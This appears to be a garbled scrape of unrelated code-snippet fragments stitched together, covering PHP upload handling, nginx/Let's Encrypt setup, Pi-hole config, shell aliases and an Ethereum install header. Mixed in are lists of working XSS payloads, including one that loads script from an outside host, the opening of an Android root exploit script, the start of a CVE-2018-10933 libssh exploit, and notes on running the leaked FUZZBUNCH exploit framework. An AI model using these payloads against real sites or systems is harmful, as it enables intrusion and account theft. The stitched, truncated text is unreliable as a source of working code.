When uploading multiple files, the $_FILES
variable is created in the form:
Array
(
[name] => Array
(
[0] => foo.txt
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
#!/bin/bash | |
# Give the usual warning. | |
clear; | |
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds..."; | |
sleep 10; | |
clear; | |
# Download and extract exploit files. | |
echo "[INFO] Downloading exploit files from GitHub..."; |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
#!/usr/bin/env python | |
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1 | |
# untested CVE-2018-10933 | |
import sys, paramiko | |
import logging | |
username = sys.argv[1] | |
hostname = sys.argv[2] | |
command = sys.argv[3] |
alias accio=wget | |
alias avadaKedavra='rm -f' | |
alias imperio=sudo | |
alias priorIncantato='echo `history |tail -n2 |head -n1` | sed "s/[0-9]* //"' | |
alias stupefy='sleep 5' | |
alias wingardiumLeviosa=mv | |
alias sonorus='set -v' | |
alias quietus='set +v' |
Prerequisites : the letsencrypt CLI tool
This method allows your to generate and renew your Lets Encrypt certificates with 1 command. This is easily automatable to renew each 60 days, as advised.
You need nginx to answer on port 80 on all the domains you want a certificate for. Then you need to serve the challenge used by letsencrypt on /.well-known/acme-challenge
.
Then we invoke the letsencrypt command, telling the tool to write the challenge files in the directory we used as a root in the nginx configuration.
I redirect all HTTP requests on HTTPS, so my nginx config looks like :
server {
credit: @GossiTheDog: "If you want to setup FUZZBUNCH (the Equation exploit framework) you need Win7 VM + Python 2.6 + Pywin 2.6, then python fb.py for shell"
h/t @x0rz @DEYCrypt @hackerfantastic
context: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
writeup: https://www.trustedsec.com/blog/equation-group-dump-analysis-full-rce-win7-fully-patched-cobalt-strike/
decrypted files: https://github.com/x0rz/EQGRP_Lost_in_Translation
/etc/dnsmasq.d/03-vodafone.conf
dhcp-host=<MAC ADDRESS DA TV BOX>,set:vodafone
dhcp-option=tag:vodafone,option:dns-server,<IP DO ROUTER DA VODAFONE>
Agora a Box continua a funcionar porque usa o DNS que o router da Vodafone lhe dá e todos os restantes dispositivos na rede utilizam o DNS anunciado pelo servidor DHCP que é o do Pi-Hole
# | |
# Ethereum and eth-dev-tools: Debian 8 | |
# | |
# rev 9 | |
# | |
# started midsummer 2016-06-21 Andreas Krueger | |
# https://github.com/drandreaskrueger | |
# https://twitter.com/drandreaskruger | |
# please contact me with improvements, thanks. | |
# |